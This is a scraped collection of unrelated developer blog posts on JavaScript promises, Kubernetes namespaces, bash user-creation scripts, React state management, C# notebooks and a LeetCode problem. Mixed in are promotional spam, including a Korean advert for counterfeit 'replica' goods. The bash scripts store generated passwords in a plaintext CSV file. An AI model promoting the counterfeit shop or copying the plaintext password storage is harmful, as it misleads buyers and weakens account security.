Promise.any You can use `Promise.any` function to wait for one of multiple promises to resolve. This function takes an array of promises and returns a single promise that resolves when the first of the promises is resolved. If all the promises are rejected, then the returned promise is rejected with an AggregateError, an exception type that groups together individual errors. ```js async function fetchFirstResourceAsync() { const urls = [ "https://jsonplaceholder.typicode.com/posts", "https://jsonplaceholder.typicode.com/comments", "https://jsonplaceholder.typicode.com/todos" ]; try { const promises = urls.map(url => fetch(url)); const firstResponse = await Promise.any(promises); const data = await firstResponse.json(); return data; } catch (error) { console.error("All requests failed:", error); } return null; } const data = await fetchFirstResourceAsync(); console.log("First available data:", data); ``` ### Promise.race `Promise.race` is similar to `Promise.any`, but it completes as soon as one of the promises is either resolved or rejected. This method is useful for timeout patterns when you need to cancel request after a certain time. ```js async function fetchDataWithTimeoutAsync() { const fetchPromise = fetch("https://jsonplaceholder.typicode.com/comments"); const timeoutPromise = new Promise((_, reject) => setTimeout(() => reject(new Error("Request timed out")), 5000)); try { const response = await Promise.race([fetchPromise, timeoutPromise]); const data = await response.json(); return data; } catch (error) { console.error("Failed to fetch or timeout reached:", error); } return null; } const data = await fetchDataWithTimeoutAsync(); console.log("Comments received:", data); ``` ## Promise.allSettled You can use `Promise.allSettled` function to wait for all the promises to complete, regardless of whether they resolve or reject. It returns a promise that resolves after all the given promises have either resolved or rejected. This promise contains an array of objects where each describes the result of each promise. ```js async function fetchMultipleResourcesAsync() { const urls = [ "https://jsonplaceholder.typicode.com/posts", "https://jsonplaceholder.typicode.com/comments", "https://jsonplaceholder.typicode.com/todos" ]; try { const promises = urls.map(url => fetch(url)); const results = await Promise.allSettled(promises); const data = results.map((result, index) => { if (result.status === "fulfilled") { console.log(`Promise ${index} fulfilled with data:`); return result.value; // Collecting fulfilled results } else { console.error(`Promise ${index} rejected with reason:`, result.reason); return null; // You might want to return null or a default object } }); return data; } catch (error) { console.error("Error fetching one or more resources:", error); } return null; } const data = await fetchMultipleResourcesAsync(); console.log("Posts, comments, todos:", data); ``` ## Awaiting Thenable Objects In JavaScript, a **thenable** is an object or function that defines a `then` method. This method behaves similarly to the `then` method found in native promises. That way `async/await` can handle these objects just like regular promises. For example: ```js class Thenable { then(resolve, reject) { setTimeout(() => resolve("Task completed"), 1000); } } const result = await new Thenable(); console.log(result); ``` Thenables objects can be useful for integrating with systems that don't use native promises but have promise-like behavior. However, thenable objects can introduce confusion to the source code as their behavior is not straightforward. Native promises are preferable due to their comprehensive feature set and better integration with the JavaScript ecosystem. > **_On my website: [antondevtips.com](https://antondevtips.com/blog/mastering-async-await-in-javascript-for-asynchronous-programming?utm_source=devto&utm_medium=social&utm_campaign=02_07_24) I already have JavaScript blog posts._** > **_[Subscribe](https://antondevtips.com/#subscribe) as more are coming._**
antonmartyniuk
1,909,100
Understanding Kubernetes Namespaces: Isolation, Connectivity, and Practical Use Cases
Introduction Welcome back to the blog series on Certified Kubernetes Administrator (CKA)...
0
2024-07-02T16:17:40
https://dev.to/jensen1806/understanding-kubernetes-namespaces-isolation-connectivity-and-practical-use-cases-45h4
kubernetes, docker, containers, namespaces
### Introduction Welcome back to the blog series on Certified Kubernetes Administrator (CKA) preparation. In today's post, we'll delve into the concept of namespaces in Kubernetes. We'll explore why namespaces are essential, how they provide isolation within a cluster, and perform hands-on tasks to demonstrate connectivity between services across different namespaces. Let's get started! ### What are Namespaces and Why Are They Needed? Namespaces in Kubernetes provide an additional layer of isolation within a cluster. They allow you to separate objects and resources, making management and organization easier. By default, if you don't specify a namespace, the resource is created in the default namespace. Kubernetes itself creates several namespaces, such as kube-system, which hosts control plane components, ensuring critical resources are isolated and protected from accidental modifications. #### Practical Benefits of Using Namespaces 1. **Isolation**: By separating resources into different namespaces, you can avoid accidental deletions or modifications. For instance, if you intend to delete a pod in the test namespace, you won’t mistakenly delete a pod in the prod namespace. 2. **Resource Management**: Namespaces make it easier to manage resources, especially in large clusters with multiple teams and projects. 3. **Access Control**: You can assign different permissions and roles (RBAC) to each namespace, enhancing security and governance. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y9ulv67ek897ofh03hwb.png) ### Hands-On Task: Connectivity Between Services Across Namespaces Let's demonstrate how namespaces affect the connectivity between services. **Step 1: Check Existing Namespaces** Run the command to list existing namespaces: ``` kubectl get namespaces ``` You'll see namespaces like default, kube-system, kube-public, and kube-node-lease. **Step 2: Create a New Namespace** You can create a namespace using a YAML file or an imperative command. Here, we'll use a YAML file. Create a file ns.yaml: ``` apiVersion: v1 kind: Namespace metadata: name: demo ``` Apply the file: ``` kubectl apply -f ns.yaml ``` Alternatively, you can use the command: ``` kubectl create namespace demo ``` **Step 3: Deploy Applications in Different Namespaces** Deploy an NGINX application in the demo namespace: ``` kubectl create deployment nginx-demo --image=nginx --namespace=demo ``` Deploy another NGINX application in the default namespace: ``` kubectl create deployment nginx-test --image=nginx ``` **Step 4: Expose the Deployments as Services** Expose the deployments as services: ``` kubectl expose deployment nginx-demo --port=80 --namespace=demo --name=svc-demo kubectl expose deployment nginx-test --port=80 --name=svc-test ``` **Step 5: Verify Connectivity** To check connectivity, we’ll use the pod IP addresses and service names. Get the Pod IPs: ``` kubectl get pods -o wide --namespace=demo kubectl get pods -o wide ``` **Check Connectivity via IP Address:** Exec into a pod in the demo namespace and curl the IP address of the pod in the default namespace: ``` kubectl exec -it <demo-pod-name> --namespace=demo -- sh curl <default-pod-ip> ``` Similarly, check from the default namespace to the demo namespace. **Check Connectivity via Service Name:** Exec into a pod in the demo namespace and curl the service name in the default namespace: ``` kubectl exec -it <demo-pod-name> --namespace=demo -- sh curl svc-test.default.svc.cluster.local ``` And vice versa: ``` kubectl exec -it <default-pod-name> -- sh curl svc-demo.demo.svc.cluster.local ``` ### Conclusion Namespaces in Kubernetes are crucial for resource isolation, management, and security. They allow different projects and teams to coexist within the same cluster without interfering with each other. Understanding and using namespaces effectively can significantly enhance your Kubernetes administration skills. I hope you found this post helpful. Stay tuned for the next part of our series, where we will dive into multi-container pods and related concepts. Happy learning! For further reference, check out the detailed YouTube video here: {% embed https://www.youtube.com/watch?v=yVLXIydlU_0 %}
jensen1806
1,909,092
Discover Perfect Quality Replica Products at Affordable Prices with RRMALL
오늘날의 시장에서 합리적인 가격에 고품질 제품을 찾는 것은 어려울 수 있습니다. RRMALL은 이러한 간극을 메우며 최고의 품질과 최저가를 보장하는 레플리카 제품을 도매가로...
0
2024-07-02T15:59:46
https://dev.to/replicaproducts/discover-perfect-quality-replica-products-at-affordable-prices-with-rrmall-284i
오늘날의 시장에서 합리적인 가격에 고품질 제품을 찾는 것은 어려울 수 있습니다. RRMALL은 이러한 간극을 메우며 최고의 품질과 최저가를 보장하는 레플리카 제품을 도매가로 제공합니다. 직접 공장 거래를 통해 RRMALL은 고객들에게 최상의 품질과 최저가를 보장합니다. 이제 RRMALL이 레플리카 제품을 위한 최고의 목적지인 이유를 자세히 알아보겠습니다. **도매가로 제공되는 탁월한 품질** RRMALL은 원본 제품을 모든 면에서 모방한 레플리카 제품을 고객에게 제공합니다. 재료부터 제작 기술까지 모든 제품은 높은 기준을 충족하도록 설계되어 내구성과 미적 매력을 보장합니다. 직접 공장 거래는 중간 유통 과정을 제거하여 비용을 절감하고 RRMALL이 뛰어난 가격을 제공할 수 있게 합니다. **다양한 제품군** 패션 액세서리, 전자 제품 또는 가정용품을 찾고 있든, RRMALL은 선택할 수 있는 포괄적인 [레플리카](https://rrmall02.com) 제품을 제공합니다. 각 제품군은 최신 트렌드와 시대를 초월한 클래식을 포함하도록 신중하게 선별되어 모든 사람에게 적합한 제품을 보유하고 있습니다. **패션 액세서리** 디자이너 핸드백과 시계부터 스타일리시한 주얼리와 선글라스까지, RRMALL은 고급 제품과 거의 구별되지 않는 다양한 패션 액세서리를 제공합니다. 각 제품은 세심한 주의로 제작되어 고급스러운 미학을 부담 없는 가격에 즐길 수 있습니다. **전자 제품** 빠르게 변화하는 기술 세계에서 최신 상태를 유지하는 것은 비용이 많이 들 수 있습니다. RRMALL은 고성능과 스타일을 제공하는 고품질 레플리카 전자 제품을 저렴한 가격에 제공합니다. 스마트폰부터 스마트워치까지, 최신 가젯을 경제적인 가격으로 만나보세요. **가정용품** RRMALL의 다양한 가정용품으로 생활 공간을 업그레이드하세요. 세련된 장식품부터 기능적인 주방용품까지, 각 제품은 품질과 가성비를 결합하여 스타일리시한 집 환경을 쉽게 조성할 수 있도록 합니다. **직접 공장 거래** RRMALL에서 쇼핑하는 주요 이점 중 하나는 직접 공장 거래입니다. 제조업체로부터 직접 제품을 소싱하여 고객이 품질을 저해하지 않고 최상의 가격을 받을 수 있도록 합니다. 이 직접 접근 방식은 또한 품질 관리를 개선하여 각 제품이 RRMALL의 높은 기준을 충족하도록 합니다. **고객 만족 보장** RRMALL에서는 고객 만족이 최우선입니다. 각 제품은 고객에게 제공되기 전에 엄격한 품질 검사를 거칩니다. 또한, RRMALL은 편리한 반품 정책을 제공하여 고객이 만족감을 가지고 쇼핑할 수 있도록 합니다. **RRMALL을 선택해야 하는 이유** RRMALL을 선택하는 것은 품질, 가성비, 신뢰성을 선택하는 것입니다. 다양한 제품군, 직접 공장 거래, 그리고 고객 만족에 대한 헌신으로 RRMALL은 레플리카 제품 시장에서 신뢰할 수 있는 이름을 확립했습니다. 자신을 위한 쇼핑이든 소매 사업을 시작하려는 것이든, RRMALL은 최고의 가치를 제공합니다. **지금 바로 쇼핑 시작하세요** 완벽한 품질의 레플리카 제품을 저렴한 가격에 발견할 준비가 되셨나요? 지금 바로 RRMALL을 방문하여 다양한 제품을 탐색해 보세요. RRMALL과 함께라면 비싼 가격 없이도 고급스러움과 품질을 즐기는 것이 그 어느 때보다 쉬워졌습니다.
replicaproducts
1,909,099
DevOps Beginnings: Mastering Python and Golang!
🌟 Exciting News! 🌟 I'm thrilled to share that I've started my journey into the world of DevOps! As a...
0
2024-07-02T16:15:23
https://dev.to/upendra_verma_74415c5652e/devops-beginnings-mastering-python-and-golang-l0d
python, devops, go, productivity
🌟 Exciting News! 🌟 I'm thrilled to share that I've started my journey into the world of DevOps! As a first step, I'm diving deep into learning the basics of Python and Golang. 🚀 I'm looking forward to connecting with fellow developers and DevOps professionals to exchange knowledge and experiences. Let's grow and innovate together! #DevOps #Python #Golang #DevCommunity #TechJourney #ContinuousLearning #TechGrowth #Programming
upendra_verma_74415c5652e
1,909,097
Automating User and Group Management on Linux with Bash
Managing user accounts and groups is a fundamental aspect of system administration. In dynamic...
0
2024-07-02T16:12:22
https://dev.to/christian_ochenehipeter_/automating-user-and-group-management-on-linux-with-bash-10cb
Managing user accounts and groups is a fundamental aspect of system administration. In dynamic environments, such as those in software development companies, the ability to automate this process can save time and reduce errors. This article explains a Bash script designed to automate the creation of user accounts and groups based on a predefined list, ensuring each user has a secure, randomly generated password. Understanding the Script The script create_users.sh takes a text file as input, where each line specifies a username and associated groups, separated by a semicolon. It performs the following actions: User and Group Creation: For each line in the input file, the script creates a user and a personal group with the same name. It also adds the user to specified groups, creating those groups if they don't already exist. Password Management: It generates a secure, random password for each user, sets it, and stores it in a secure file, ensuring that only the root user can access it. Logging: All actions are logged to /var/log/user_management.log, providing a clear audit trail. Why This Approach? This script emphasizes security and accountability. By generating random passwords and securing the password file, it ensures that user accounts are protected from the outset. Logging actions allow system administrators to track changes and troubleshoot issues. Deployment and Usage To use the script, simply run it as root and pass the path to your input file as an argument: sudo bash create_users.sh usernames.txt Ensure that your input file follows the format username;group1,group2. Learn More For those interested in further automating and managing Linux systems, the https://hng.tech/internship offers valuable resources and opportunities. Whether you're looking to hire tech talent or enhance your skills, https://hng.tech/hire platform and premium courses provide a wealth of information and support. Conclusion Automating user and group management not only streamlines system administration tasks but also enhances security and efficiency. By leveraging simple yet powerful Bash scripts, sysadmins can ensure their systems are well-organized and secure.
christian_ochenehipeter_
1,909,095
The Difference Between indexOf and findIndex in JavaScript
indexOf is a method available for both arrays and strings in JavaScript, used to search for the first...
0
2024-07-02T16:06:28
https://dev.to/sbabaeizadeh/the-difference-between-indexof-and-findindex-in-javascript-42ij
webdev, javascript, programming
indexOf is a method available for both arrays and strings in JavaScript, used to search for the first occurrence of a value using strict equality ("==="). findIndex is a higher-order function specifically designed for arrays, used to search for the first element that satisfies a condition specified by a callback function. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y7zm8m430ed3mlb7rdug.png)
sbabaeizadeh
1,898,451
Context API vs. Redux: When and Why to Use Them in React
Before starting to explore the differences and use cases of both Context API and Redux, it is...
0
2024-07-02T16:03:07
https://dev.to/zahidkhanxen/context-api-vs-redux-when-and-why-to-use-them-in-react-2c8d
Before starting to explore the differences and use cases of both Context API and Redux, it is essential to understand why these two solutions were developed. In simple React, we can pass down data from parent components to child components. The parent component is where your main component is rendering. For example: Let's say we have a component named Greet.js, and this component is rendering in App.js, making App.js its parent component. If we pass a constant firstName with the value "John", it will look like this: ```jsx //App.js export const App = () => { const firstName = "John"; return ( <Greet name={firstName} /> <Profile name={firstName} /> ); } ``` ```jsx // Greet.js export const Welcome = ({ name }) => { return <h1>Welcome : {name}</h1>; } ``` ```jsx //Profile.js export const Profile = ({ name } => { return <h1> userName : {name} </h1> ``` This above method also known as Prop Drilling .Passing props can become inconvenient when you need to pass some prop deeply through the tree, or if many components need the same prop the prop drilling becomes complex and then for passing props we use context API. **Context API**: Context is a way to pass data through the component tree without having to pass it down manually at every level.It's beneficial for sharing data that can be considered "global" for a tree of React components, such as the current authenticated user, theme, or preferred language. There are three step to implement Context API: **Create a Context**: Define a context to hold the state. **Provide Context**: Wrap the top-level component with the context provider. **Consume Context**: Use the context in the child components to access the state. **1-Create a Context** ```jsx // UserContext.js import React, { createContext, useState } from 'react'; const UserContext = createContext(); const UserProvider = ({ children }) => { const [name, setName] = useState("John"); return ( <UserContext.Provider value={{ name }}> {children} </UserContext.Provider> ); }; export { UserContext, UserProvider }; ``` **2-Provide Context** ```jsx // App.js import React from 'react'; import { UserProvider } from './UserContext'; import Welcome from './Welcome'; import Profile from './Profile'; const App = () => { return ( <UserProvider> <div> <Welcome /> <Profile /> </div> </UserProvider> ); }; export default App; ``` **3-Consume Context** ```jsx // Welcome.js import React, { useContext } from 'react'; import { UserContext } from './UserContext'; const Welcome = () => { const { name } = useContext(UserContext); return <h1>Welcome: {name}</h1>; }; export default Welcome; ``` ```jsx // Profile.js import React, { useContext } from 'react'; import { UserContext } from './UserContext'; const Profile = () => { const { name } = useContext(UserContext); return <h1>userName: {name}</h1>; }; export default Profile; ``` Using the Context API allows data to flow anywhere in the component tree, making it a superior method for managing application state compared to prop drilling. However, as applications grow in complexity and certain side effects become challenging to manage within individual components, Redux emerges as a powerful solution. **React Redux** Redux simplifies state management by centralizing it through a global store. It not only eliminates the need for prop drilling but also provides an efficient way to handle side effects using middleware. This approach ensures that side effects, such as asynchronous data fetching or logging, are managed centrally, keeping components focused solely on UI rendering. Let's understand it with example : These steps involved in Redux data flow: **Create Action** : Define action to be perform **Create Reducer** : Define how to perform action and update it **Create Store** : Recieved updated state from Reducer and make it available to call in any component. **1.Create Action** ```jsx // userActions.js export const setName = (name) => ({ type: 'SET_NAME', payload: name, }); ``` **2.Create Reducer** ```jsx // userReducer.js const initialState = { name: 'John', // initial state }; const userReducer = (state = initialState, action) => { switch (action.type) { case 'SET_NAME': return { ...state, name: action.payload }; default: return state; } }; export default userReducer; ``` **3.Create Store ** ```jsx // store.js import { createStore } from 'redux'; import userReducer from './userReducer'; const store = createStore(userReducer); export default store; ``` Wrap your application with the Redux Provider component to make the store available to all components. ```jsx // App.js import React from 'react'; import { Provider } from 'react-redux'; import store from './store'; import Welcome from './Welcome'; import Profile from './Profile'; const App = () => { return ( <Provider store={store}> <div> <Welcome /> <Profile /> </div> </Provider> ); }; export default App; ``` Now, you can use this globally in any component by using useSelector hook : ```jsx // Welcome.js import React from 'react'; import { useSelector } from 'react-redux'; const Welcome = () => { const name = useSelector(state => state.name); return <h1>Welcome: {name}</h1>; }; export default Welcome; ``` **Conclusion**: In the end, whether you choose React's Context API or Redux depends on what your application specifically requires and the particular challenges it faces.
zahidkhanxen
1,909,093
User Creation Aumation in Linux with a Bash Script
Introduction In the world of a SysOps engineer, one of the common tasks you will encouter...
0
2024-07-02T16:00:42
https://dev.to/clintt/user-creation-aumation-in-linux-with-a-bash-script-630
## **Introduction** In the world of a SysOps engineer, one of the common tasks you will encouter is the creation and management of users and groups. Automation helps simplify this process, making it efficient and time saving. In this blog post, we'll go through a bash script createusers.sh that automates the creation of users and groups, set up home directories with appropriate permissions and ownership, generate random passwords for the users, and log all actions. ### **Breaking down the script** Here is the complete script created in create_users.sh with and an explanation of each section. ``` #!/bin/bash # Define the log & password file variables LOG_FILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.csv" # Create and set permissions for log and password files touch $LOG_FILE mkdir -p /var/secure touch $PASSWORD_FILE chmod 600 $PASSWORD_FILE # Generate a random password for a user generate_password() { tr -dc A-Za-z0-9 </dev/urandom | head -c 12 } # Check if the file is provided if [ -z "$1" ]; then echo "Usage: $0 <user_file>" exit 1 fi USER_FILE="$1" # Process each line of the user file while IFS=";" read -r username groups; do # Remove leading and trailing whitespace from username and groups username=$(echo $username | xargs) groups=$(echo $groups | xargs) # If a user does not exist, create user and personal group if ! id -u $username >/dev/null 2>&1; then useradd -m -s /bin/bash $username echo "$(date) - Created user: $username" >> $LOG_FILE # Generate a password for the user password=$(generate_password) echo "$username,$password" >> $PASSWORD_FILE echo "$username:$password" | chpasswd # Set appropriate permissions and ownership for home directory chown -R "$username:$username" "/home/$username" chmod 700 "/home/$username" # Assign the user to the specified groups if [ -n "$groups" ]; then IFS=',' read -r -a group_array <<< "$groups" for group in "${group_array[@]}"; do if ! getent group $group >/dev/null; then groupadd $group echo "$(date) - Created group: $group" >> $LOG_FILE fi usermod -aG $group $username echo "$(date) - Added $username to group: $group" >> $LOG_FILE done fi else echo "$(date) - User $username already exists" >> $LOG_FILE fi done < "$USER_FILE" echo "The user creation process is completed." ``` ### **Explanation** **Defining the log & password file variables:** We define the paths for the log file and the password storage file. It also ensures that a secure directory for password storage is created with the neccesary permissions. ``` LOG_FILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.csv" touch $LOG_FILE touch $PASSWORD_FILE chmod 600 $PASSWORD_FILE ``` **Processing the Input File:** The script reads the input file provided. Each line is expected to have a username and a list of groups separated by a semicolon. The script processes each line, removing any leading or trailing whitespace from username and groups. ``` if [ -z "$1" ]; then echo "Usage: $0 <user_file>" exit 1 fi USER_FILE="$1" while IFS=";" read -r username groups; do # Remove leading and trailing whitespace from username and groups username=$(echo $username | xargs) groups=$(echo $groups | xargs) ``` **Generating Random Passwords:** This script generates random passwords for each user using a secure method. These passwords are then stored in a directory; /var/secure/user_passwords.csv, with the neccesary file permissions set to ensure only the owner can read it. ``` generate_password() { tr -dc A-Za-z0-9 </dev/urandom | head -c 12 } ``` **Function to Create Users and Groups:** This script creates each user and their group, as well as any additional groups. If the user or group already exists, the script logs a message and skips to the next entry. It sets up home directories with appropriate permissions and ownership. ``` if ! id -u $username >/dev/null 2>&1; then useradd -m -s /bin/bash $username echo "$(date) - Created user: $username" >> $LOG_FILE password=$(generate_password) echo "$username,$password" >> $PASSWORD_FILE echo "$username:$password" | chpasswd chown -R "$username:$username" "/home/$username" chmod 700 "/home/$username" if [ -n "$groups" ]; then IFS=',' read -r -a group_array <<< "$groups" for group in "${group_array[@]}"; do if ! getent group $group >/dev/null; then groupadd $group echo "$(date) - Created group: $group" >> $LOG_FILE fi usermod -aG $group $username echo "$(date) - Added $username to group: $group" >> $LOG_FILE done fi ``` ## Running the Script Before executing the script, ensure it has executable permissions. You can make it executable by granting the necessary permissions using: ``` chmod +x create_users.sh ``` Run the Script with Root Privileges. ``` sudo ./create_users.sh ``` After executing the script, it will display messages confirming the creation. ## Conclusion This bash script helps automate user creation and management making the process easier and saves time. This ensures all actions are logged and passwords stored securely. To learn about this and more, check out [HNG Internship](https://hng.tech/internship) and also check out [HNG Hire](https://hng.tech/hire) for top talents.
clintt
1,909,090
An application form asked me what I feel about their value "doing what it takes". I shared a story about an old dog.
"One of our values is 'Do-What-It-Takes.' Please provide an example of a time you’ve applied this and...
0
2024-07-02T15:55:30
https://dev.to/tacodes/some-application-form-asked-me-what-i-feel-about-their-value-doing-what-it-takes-i-shared-a-story-about-an-old-dog-den
application, jobhunt, story
"One of our values is 'Do-What-It-Takes.' Please provide an example of a time you’ve applied this and what the impact was." I'm kind of tired of the rinse-and-repeat job description-focused answers. 'I always met deadlines cause I *did what it took*', 'the customers were 99.98% happy with the results', etc... They've yielded no positive results for me on my job hunt. I'm not standing out over the noise of the 999 other applications. So, I kind of just write what I feel now. If something sticks, we'll probably have that "culture fit" we're all seeking these days. Anyway, here's what I wrote in my application - majorly unedited and just blathered out. It's the story of an old dog. ____ This story is outside the realm of tech, but I see this from the perspective of "doing what it takes [to be a decent human]". Being a decent human includes things like trying to reduce pollution, inequities, and all other evils we've created... being human also includes speaking out against a group if you believe there is a wrong to be righted. Two years ago, my roommate's dog had a small wound on his paw for about a month that wasn't going away. First, waited for my roommate (dog owner) to act. He did not (for several days/weeks), the wound expanded because the poor dog kept licking it. I told the dog owner a story about a cat I had seen in a similar situation and she had to lose a leg. I told him it was important to me that the dog be cared for promptly. I suggested a dog cone so the wound could heal. I tried secretly treating the wound but was told to stop. And the dog cone suggestion was ignored. I eventually bought a dog cone, but it was never used. The wound expanded. For 18 months. I tried to wrap the wound, clean it, cone the dog while the owner was away, and gently remind the owner that the wound needs professional attention. He ignored the problem. The wound kept growing. And the dog was clearly hurt, hiding, and not in a good way. Around this time, this dog's owner picked up a new puppy. Exacerbated by the puppy's want to play constantly, the old dog's wound took up most of the paw and he was very hurt, completely unable to use that foot. But the owner thought the old dog dealt with pain admirably. No one else has spoken up directly to the dog owner to this point. Not a single neighbor, coworker in the office, other roommates, no one was speaking up for this dog because they didn't want to ruffle feathers. I had to 'do what it takes' to get this dog taken care of at this point. I'll confront, I'll set boundaries, I'll call the authorities if it gets to it. The direct conversation of "you need to care for your neglected dog, he needs medical attention, and you need to rethink your priorities" became a defensive confrontation. Then all of my neighbors and mutually connected friends stopped being friendly; they were no longer cordial and were more standoff-ish, even glaring at me sometimes. The dog owner's family stopped inviting me to Christmas dinners. Despite all of the negative reactions by these groups of people. Despite the resentment the dog owner still has for me. Despite the 'shunning'.... Despite all this. The old dog has been treated. The old dog is now two toes less (amputated), but he now able to play with the puppy, he can stand on all four paws, and the old dog is also a happy dog again. I did what it took to make sure that old dog can live out the rest of his days in relative comfort. ____ Don't be afraid to speak out, speak up, don't be afraid to be the squeaky wheel when it feels like you must. You might feel alone in your fight, but you are not.
tacodes
1,909,089
350. Intersection of Two Arrays II
350. Intersection of Two Arrays II Easy Given two integer arrays nums1 and nums2, return an array...
27,523
2024-07-02T15:48:03
https://dev.to/mdarifulhaque/350-intersection-of-two-arrays-ii-3fgm
php, leetcode, algorithms, programming
350\. Intersection of Two Arrays II Easy Given two integer arrays `nums1` and `nums2`, return _an array of their intersection_. Each element in the result must appear as many times as it shows in both arrays, and you may return the result in **any order**. **Example 1:** - **Input:** nums1 = [1,2,2,1], nums2 = [2,2] - **Output:** [2,2] **Example 2:** - **Input:** nums1 = [4,9,5], nums2 = [9,4,9,8,4] - **Output:** [4,9] - **Explanation:** [9,4] is also accepted. **Constraints:** - <code>1 <= nums1.length, nums2.length <= 1000</code> - <code>0 <= nums1[i], nums2[i] <= 1000</code> **Solution:** ``` class Solution { /** * @param Integer[] $nums1 * @param Integer[] $nums2 * @return Integer[] */ function intersect($nums1, $nums2) { // Count occurrences of each element in both arrays $counts1 = array_count_values($nums1); $counts2 = array_count_values($nums2); $intersection = []; // Iterate through the first count array foreach ($counts1 as $num => $count) { // Check if the element exists in the second array if (isset($counts2[$num])) { // Find the minimum occurrence $minCount = min($count, $counts2[$num]); // Add the element to the result array, repeated $minCount times for ($i = 0; $i < $minCount; $i++) { $intersection[] = $num; } } } return $intersection; } } ``` **Contact Links** - **[LinkedIn](https://www.linkedin.com/in/arifulhaque/)** - **[GitHub](https://github.com/mah-shamim)**
mdarifulhaque
1,909,088
Ringing in Savings: A Guide to Home Phone Deals in the Age of Mobiles
In a world dominated by smartphones, you might be wondering if a home phone still holds value....
0
2024-07-02T15:47:24
https://dev.to/andy_wilson_783aeb2815937/ringing-in-savings-a-guide-to-home-phone-deals-in-the-age-of-mobiles-23nn
In a world dominated by smartphones, you might be wondering if a home phone still holds value. Surprisingly, for many households, a landline phone remains a reliable and cost-effective communication tool. Whether it's for business calls, keeping in touch with elderly relatives, or simply a backup option in case of emergencies, home phone deals can offer significant advantages. **Why Consider a Home Phone?** While mobile phones are undoubtedly convenient, there are several reasons why a home phone might be the right fit for you: **Crystal Clear Calls:** Landlines often boast superior sound quality compared to mobile phones, especially in areas with weak cellular reception. This can be a game-changer for important conversations where clarity is crucial. **Cost-Effectiveness:** For those who make frequent local calls, home phone plans can be significantly cheaper than relying solely on mobile minutes. **Always Connected:** Unlike smartphones that can run out of battery, a landline remains functional even during power outages, ensuring you can always stay connected during emergencies. **Dedicated Business Line:** For home-based businesses, a separate landline keeps professional and personal calls distinct. It also creates a more professional image for your clients. **Peace of Mind for Seniors:** For elderly family members who might not be comfortable with smartphones, a home phone provides a familiar and reliable way to stay connected. **Exploring Home Phone Deals** With a renewed understanding of the potential benefits, let's delve into the world of **[home phone deals](https://fastbroadbandtv.com/home-phone)**: **Landline Providers:** Traditional phone companies, cable providers, and even some internet service providers (ISPs) offer home phone plans. Shop around to compare pricing and features. **Packages and Bundles:** Many providers bundle home phone service with other offerings like internet or cable TV. These bundles can often be more cost-effective than standalone plans. **Contract vs. No-Contract:** Consider whether you're comfortable committing to a contract for a lower rate or prefer the flexibility of a no-contract plan with potentially higher monthly costs. **Features to Look For: **Unlimited local calling is a common feature, but consider additional options like call waiting, caller ID, voicemail, and international calling if needed. Finding the Perfect Deal **Here are some pointers to secure the best home phone deal for your needs:** **Assess Your Needs:** Determine your calling habits and desired features. Do you need unlimited local calls? International calling? Voicemail? Identifying these needs will guide your search. **Compare "Home Phone Deals":** Utilize online resources and comparison websites to research available plans from different providers in your area. **Read the Fine Print:** Understand additional fees like equipment rental charges, per-minute international rates, and any early termination fees associated with contracts. **Promotional Offers:** Look for introductory discounts or bundled packages that can offer significant savings. Negotiate: Although less common with landline plans, sometimes you can negotiate with providers, especially if you're bundling services.
andy_wilson_783aeb2815937
1,909,087
Unlock the Power of C# in Polyglot Notebooks
This article shows how to use C# skills in polyglot notebooks for better data management and...
0
2024-07-02T15:46:11
https://dev.to/andreaslennartz/unlock-the-power-of-c-in-polyglot-notebooks-3kj2
jupyter, csharp, etl, polyglot
This article shows how to use C# skills in polyglot notebooks for better data management and analysis. ### C# and Polyglot Notebooks C# is a powerful programming language widely used for building a variety of applications, from web apps to complex data processing systems. Polyglot notebooks, like Jupyter notebooks, allow you to write and execute code in multiple programming languages within the same document. This makes it easier to share and collaborate on projects, especially those involving data analysis, visualization, or machine learning. Traditionally, C# hasn't been as common in the realm of polyglot notebooks, which have been more associated with languages like Python and R. However, Microsoft has made significant improvements in recent years, making it much easier to use C# within these environments. With these advancements, we can now leverage the full power of C# for tasks that require high performance and robust tooling. ### The Use-case of ETL in a Polyglot Notebook ETL stands for Extract, Transform, Load, and it's a process commonly used in data management to move data from one place to another, transform it into a usable format, and then load it into a database or another storage system. In polyglot notebooks, basic tasks like loading data from a CSV file are supported out-of-the-box. However, when dealing with more complex data sources such as databases or web APIs, and then transforming this data, ETL pipelines become indispensable. We are using [ETLBox, a library designed for ETL processes in .NET environments](https://www.etlbox.net/?utm_source=devto&utm_content=polyglot), because it allows us to write ETL code in C#. By using a polyglot notebook, we can combine the flexibility of different programming languages with the power of C# for data manipulation. ### How to Create Your Own Polyglot Notebook To create your own polyglot notebook in VS Code, follow these steps: 1. **Prerequisites**: Make sure you have Visual Studio Code (VS Code) installed on your computer. You will also need to install the Polyglot Notebooks extension to enable multi-language support within your notebook. 2. **Press** `CTRL + SHIFT + P` **to open the command dialogue**. 3. **Select** `Polyglot Notebook: Create Default Notebook`. 4. **Choose the** `.ipynb` **extension and select the** `C#` **language**. 5. **Add the following code blocks** to start coding in C#: ```csharp // This is where your C# code will go var s = "Hello, Polyglot Notebook!"; s ``` (Note the missing `;` at the end of the last line) 6. **Run the code**: This should print `Hello, Polyglot Notebook!` as output. These steps will set up a fresh new notebook where you can start exploring using Polyglot Notebooks with C#. ### Setting Up a Database Table for ETL Using C# in a Polyglot Notebook Let's see how to set up a simple database table using C# within a polyglot notebook. - **Install ETLBox.SqlServer Package** Before we begin, ensure you have the ETLBox.SqlServer package installed. This package provides the necessary tools to interact with SQL Server databases using ETLBox. ```csharp #r "nuget:ETLBox.SqlServer, 3.4.0" ``` - **Set Up Connection Credentials** ```csharp using ETLBox; using ETLBox.SqlServer; using ETLBox.ControlFlow; IConnectionManager connMan = new SqlConnectionManager("Data Source=localhost;User Id=sa;Password=YourStrong@Passw0rd;Initial Catalog=demo;TrustServerCertificate=true;"); ``` Replace the connection string in the code below with your SQL Server credentials. This example assumes you are connecting to a local SQL Server instance (`localhost`), using the `sa` user with the password `YourStrong@Passw0rd`, and targeting a database named `demo`. - **Define Table Structure** We'll define a simple table named `Test` with three columns: `Id` (INT, identity column), `XValue` (DATETIME), and `YValue` (INT). This table will store sample data for demonstration purposes. ```csharp var def = new TableDefinition("Test", new List<TableColumn>() { new TableColumn("Id", "INT", allowNulls: false, isIdentity:true, isPrimaryKey:true), new TableColumn("XValue", "DATETIME", allowNulls: false), new TableColumn("YValue", "INT", allowNulls: false) }); ``` - **Create the Table** Before creating the table, 